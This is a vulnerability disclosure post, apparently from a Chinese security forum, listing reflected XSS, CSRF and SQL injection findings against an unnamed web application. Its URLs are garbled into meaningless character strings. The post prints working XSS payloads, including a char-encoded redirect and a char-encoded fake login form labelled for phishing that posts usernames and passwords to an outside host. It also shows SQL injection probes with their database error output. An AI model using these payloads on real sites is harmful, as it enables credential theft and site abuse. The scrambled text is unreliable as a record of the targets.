*[Multiples Vulnerabilities] *
* *
* 3 XSS (reflected) *
* 1 CSRF *
* 1 NoSQLi (Json object) *
* 1 PostGreSQL SQLi (Exploitable?) *
* 1 File and Path Disclosure *
* 1 Source code Info-leak
[*] XSS:
跨站1
75bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6&6j5i4u0S2i4K6u0r3M7$3S2G2N6#2)9#2k6Y4W2S2i4K6g2X3k6X3W2D9k6g2)9K6c8X3&6S2L8h3g2Q4x3@1c8Q4x3U0k6D9N6q4)9K6b7X3u0G2k6s2V1`. onload=alert(‘XSSED’)>
利用POC:
21dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6&6j5i4u0S2i4K6u0r3M7$3S2G2N6#2)9#2k6Y4W2S2i4K6g2X3k6X3W2D9k6g2)9K6c8X3&6S2L8h3g2Q4x3@1c8Q4x3U0k6D9N6q4)9K6b7X3u0G2k6s2V1`.
onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
或者进行钓鱼:
22fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6&6j5i4u0S2i4K6u0r3M7$3S2G2N6#2)9#2k6Y4W2S2i4K6g2X3k6X3W2D9k6g2)9K6c8X3&6S2L8h3g2Q4x3@1c8Q4x3U0k6D9N6q4)9K6b7X3u0G2k6s2V1`.
onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,1097,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
跨站2
5b1K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6F1k6i4c8%4L8%4u0C8i4K6u0r3L8X3g2@1N6$3!0J5K9#2)9K6c8X3&6W2N6#2)9#2k6X3c8G2L8h3q4A6L8W2)9K6c8l9`.`.
跨站3
c41K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6E0j5h3&6#2j5h3I4Q4x3V1k6U0M7$3y4Q4x3@1k6E0L8$3c8W2i4K6y4p5
[*] CSRF:
1 管理员退出
30bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6F1k6i4c8%4L8%4u0C8i4K6u0r3L8X3g2@1N6$3!0J5K9#2)9K6c8X3&6W2N6#2)9#2k6X3c8G2L8h3q4A6L8W2)9K6c8l9`.`.
2 报告删除
a41K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6F1k6i4c8%4L8%4u0C8i4K6u0r3L8X3g2@1N6$3!0J5K9#2)9K6c8X3&6W2N6#2)9#2k6X3c8G2L8h3q4A6L8W2)9K6c8l9`.`.
FROM events /**
output:
Event ID ‘9999 OR SELECT 1,2 FROM events ‘ could not be retrieved.
Couldn’t find Event with id=9999 OR SELECT 1,2 FROM events
889K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4z5e0u0Q4x3X3f1I4y4U0S2Q4x3X3f1I4i4K6u0W2y4e0m8Q4x3V1k6W2N6X3g2F1N6q4)9#2k6Y4y4@1M7X3g2S2L8g2)9J5c8Y4y4W2L8X3c8Q4y4h3k6H3j5$3q4H3i4K6g2X3k6X3W2D9k6g2)9K6c8X3g2$3i4K6g2X3K9h3c8Q4x3@1b7&6z5e0V1&6z5e0V1&6z5e0V1&6z5b7`.`. Output:
Event ID ‘99999999999’ could not be retrieved.
PG::Error: ERROR: value “99999999999” is out of range for type
[培训]科锐逆向工程师培训第53期2025年7月8日开班!